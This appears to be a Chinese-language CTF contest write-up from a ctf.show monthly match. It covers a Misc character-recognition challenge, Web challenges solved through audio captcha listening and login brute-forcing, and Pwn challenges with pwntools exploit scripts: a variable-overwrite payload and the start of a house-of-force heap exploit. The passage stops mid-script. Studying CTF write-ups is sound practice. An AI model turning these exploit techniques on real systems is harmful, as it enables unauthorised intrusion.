摆烂了摆烂了 太难了
聪明的师傅已经组队打起月赛了
试试能不能苟住前5
苟住了 复现的后面再补充吧
文章目录
1.Misc
麻麻的 只会一题 其他的等复现再补充吧
中文识别带师
挺好玩一个题 格局打开
linux nc进环境(注意进来别用win的netcat连 不然你就会像下面那样 因为utf-8的环境会乱码)
连进去后 就认字 一炷香十个字还是蛮久的
我的解法是用手机或者电脑手写板 手写出字后百度百科查注音与笔画(这把的答案是带音调的 cv过去就行了)不过 积累与特征也能做)
出题师傅的自动解法的话参考官方wp 挺复杂的 所以再次格局打开
2.Web
简单的验证码
非预期解了 耳朵听验证码 手爆登录名密码 就出了
easyPOP
好像这题也是爆非预期了 yue天痛哭
不会 暴打队里的web爷做出来的
官解很详细 不想写
3.Pwn
pwn01-My_sword_is_ready
签到题 就最简单的变量覆盖
直接丢payload了
from pwn import *
p = remote("pwn.challenge.ctf.show", 28171)
payload = b'a'*36+p32(222)*3
p.recvuntil('Come and jj with bit!\n')
p.sendline(payload)
p.interactive()
pwn02-Precision_and_grace
house of force
payload:
from pwn import *
context.log_level = "debug"
p = remote('pwn.challenge.ctf.show', 28088)
elf = ELF("./pwn03-Precision_and_grace")
libc = ELF("/home/hackerbc/64bitbc-2.27.so")
def create(size, content):
p.sendlineafter(" :", "1")
p.sendlineafter(" : ", str(size))
p.sendlineafter(":", content)
def edit(idx, content):
p.sendlineafter(" :", "2")
p.sendlineafter(" :", str(idx))
p.sendlineafter(" : ", content)
def show(idx):
p.sendlineafter(" :", "3")
p.sendlineafter(" :", str(idx))
def delete(idx):
p.sendlineafter(" :", "4")
p.sendlineafter(